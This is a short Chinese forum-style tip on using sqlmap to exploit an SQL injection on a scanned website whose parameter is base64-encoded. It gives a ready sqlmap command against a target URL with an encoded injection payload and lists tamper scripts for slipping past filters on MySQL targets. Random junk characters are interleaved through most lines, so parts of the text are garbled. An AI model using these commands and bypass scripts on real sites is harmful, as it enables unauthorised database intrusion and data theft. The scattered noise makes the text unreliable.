WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
5 O5 a, p# `0 S0 r5 {- Q8 C! p4 B3 o2 I7 i# j( F# k
sqlmap的tamper里有个base64encode.py
/ T O, j0 Z' t
8 c( \" q8 [# S& v使用如下% B$ q9 h) \# ?( `
; c7 D# o: p' G2 lsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
. S8 {2 X, m8 b. u% `! {) X" @/ u7 E5 P5 z2 V! f/ i
6 Q" \7 I, _' g/ _
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
: U- m# W6 {' |) @. n" R( K
8 C& W, C" L: \9 e: e5 |9 Y# L其中常用到的bypass脚本绕过SQLMAP主要两个脚本:. N6 B/ |, M5 m
/ X+ n4 U$ \* x" H
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
0 C# I6 D* F' U6 e9 p w# Rspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
+ r7 |& X. Z3 `" v首先确定目标数据库版本,然后选择相应的脚本。
+ Z, K5 ]! S% e; S" ~* A# F# f- [-v 3 --batch --tamper "space2hash.py"# d- t% o! P' C& s$ @% Y
3 R( a$ i- k: v: ]还有其他一些插件:1 g0 m, }# a+ |
encodes编码 ——charencode.py
7 D4 m3 b% m; \" x" I2 kbase64编码 —— base64encode.py
3 q9 c3 c1 V) {* C替换空格和关键字 —— halfversionedmorekeywords.py0 z9 n. w* [- f: x3 G+ u
|
* X0 }' K( r% u- R4 _. r# z0 y2 b1 X% L5 {, J' M! k% @
: X: N' H$ |$ c7 B
. R3 P6 x7 I+ d, R) q |